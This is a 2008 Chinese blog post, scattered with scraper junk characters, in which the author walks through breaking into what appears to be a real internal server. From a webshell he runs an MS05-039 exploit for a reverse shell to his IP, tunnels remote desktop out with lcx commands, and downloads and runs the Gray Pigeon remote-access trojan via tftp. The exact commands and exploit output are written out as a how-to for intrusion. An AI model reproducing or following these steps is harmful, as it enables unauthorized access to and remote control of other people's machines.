MS05-039+lcx=内网服务器
上一篇 /
下一篇 2008-09-12 07:39:45
最近一直为了拿不到服务器而郁闷。自己菜!
6})eR&U aC,? Jf0上次拿到过两个都是下载pcanywhere里面的cif文件然后用pcanywhere连的。
.A'q*d7?JV7Y0]4O0
4^pH4[ h ]0看了邪恶的原创贴>MS05-039××,然后就学会了。
$i6S^-W.p!Ee,C0就马上去Webshell里面测试下。IXPUB技术博客einnT
6v j|7k1R3?Q6_0首先把Ms05039漏洞利用程序传上去。
3iN&iC)k0Wf0
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客7Y_6C{A0s
IXPUB技术博客3{`n
a3h~o&V.J)P O%r
然后选择Wscriptshell程序运算器。点击Wscriptshell
1dO4\,l&N i8M4Ce0然后Ms05039 127.0.0.1(服务器保留IP) 219.144.177.19 2105(我监听的端口)
,d!|D4dYw(F0
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客6w)n:{5E"Nb2_
在本地监听2105端口
MUp{/k0
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客kAg`v RFg
点击运行IXPUB技术博客-j N1I4t+}
IXPUB技术博客7A'JB^#ypL
n
终于反弹成功(看图)
%TC.Z6n
x)s,|7B%Ox0
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客dn;w
g)?3w_
IXPUB技术博客5v&\Ro-qEC
别高兴太早了。BT了吧,内网服务器。。。郁闷吧
L
Y?`a0
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
Q2b-rf6[C0mV)J0
g
m,MG8FH^8igM0也别泄气啊,这不,我早就把把lcx传到webshell上去了。
h:F] KEbrBkn0××:“lcx是啥啊?IXPUB技术博客&F"KD8J3u sF#X
晕,你连xingxuexin老大的动画都不看,咋混啊?IXPUB技术博客+D^(]Koej5j
第八课里面讲得够仔细了。。。
d7nx H%pC)RaEkP/q0先在本地监听51转8899 lcx -listen 51 8899IXPUB技术博客%?4c0_d-i'F,c+i+xl
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
+L7]%h7\ U&dS5?0。××:"为啥是8899啊?"它的远程终端是8899哦
HOZt-g&C'W7VD0IXPUB技术博客xmz#B]
然后到在cmdshell下面运行lcx -slave 219.144.177.19 51 172.16.2.10 8899IXPUB技术博客!S2q"ZD%s1Ptn$uM
这条命令的意思是将内网肉鸡的8899端口转发到本机的51上来。
GWtj&l,[9_!J0
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
jt:KMlh8l!Yi%Uj0
`Wh s!}0然后敲击回车,打开MSTSC.EXE连接本机8899端口。IXPUB技术博客rh
?'Y-~"z
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
7UvD_2[D$`)[0`*O;a0
n*\dmUDM&p)s0看到没有连接上了
-L"^&w(}/Q n0
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客T| F8k,G8Z0t
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
Uy(KcUMg7J0IXPUB技术博客$grH;N}$R3]3y
由于服务器是网通的,还是内网的,汗×IXPUB技术博客{j4F9m
BfK%ar c
所以远程桌面卡得很
(py*Kr ]|x?^.C0本来架设ftp呢!连接后假死状态。然后经过xingxuexin老大的执教,
Y Z(h{x9zq0就架设了tftpIXPUB技术博客0]:P+Ig
B4Z'}5p$J
然后在cmdshell下面运行tftp -i 我的IP get 灰鸽子服务端.exe
2l;^7X$c&v|ygz[0等了半个小时吧,服务端传完了。
S^~+nI,ST8[|0然后运行了..............IXPUB技术博客'l{Tb.R
}EFs}E"G
iR0然后老大吩咐我做动画,乖乖我的CPU1.7内网256,估计整不了啊。
e$gN9wZ0准备做动画的突然发现ms05039反弹不了了。IXPUB技术博客$}(Q0Jc9VL
[+] Trying to connect to remote port on127.0.0.1:445...ESTABLISHED
v&bs%^-p
J^0[+] Making null session...IXPUB技术博客
P$X3GT4k1q[m)AT
[!] Failed to get responding data
w:d~8B9@C0不知道为啥?IXPUB技术博客x2BF1a/g6G%W
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客W+D`(T7H-}2n
s.X!G ^&P]J&c0郁闷啊,后来发现管理员没在啊,应该。郁闷ingIXPUB技术博客u(Ktf(`-le-i
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0 resized="true">IXPUB技术博客-Hr.Z0P8z
A
IXPUB技术博客6d0eNo$|3_iD
这次拿服务器算是完成篇吧
$@,x)uo!j*p5J9i0很简单的,没什么技术的,应该一看就会了。吧。。。IXPUB技术博客O+E.uVToo&mP
qlL3X(B/LI0就到这里了。。。。希望大家技术>Beter and Beter
相关阅读:
- AD服务器启动慢|srv2000 (服务器管理-win2, 2008-9-04)
- DC报错EVENT ID13|ca证书服务器自动注册 (服务器管理-win2, 2008-9-04)
- dns服务器重建恢复|dns4521 (服务器管理-win2, 2008-9-04)
- dns服务器重建恢复|dns4521 (服务器管理-win2, 2008-9-04)
- 信任域错误:RPC服务器不可用 (服务器管理-win2, 2008-9-04)
- 区域不是由DNS服务器加载|修复dns区域 (服务器管理-win2, 2008-9-04)
- Windows2003DNS服务器如何解析Internet 域名|dns转发器设置 (服务器管理-win2, 2008-9-04)
- 域环境配置ISA2006企业版存储服务器及NLB之一配置存储服务器 (rickyfang, 2008-9-04)
- 源服务器目前拒绝服务请求|dssite.msc手动强制同步活动目录 (服务器管理-win2, 2008-9-04)
- 打造SSL安全加密的FTP服务器 (妖界之箭, 2008-9-07)
导入论坛
引用链接
收藏
分享给好友
推荐到圈子
管理
举报
TAG:
lcx
服务器
内网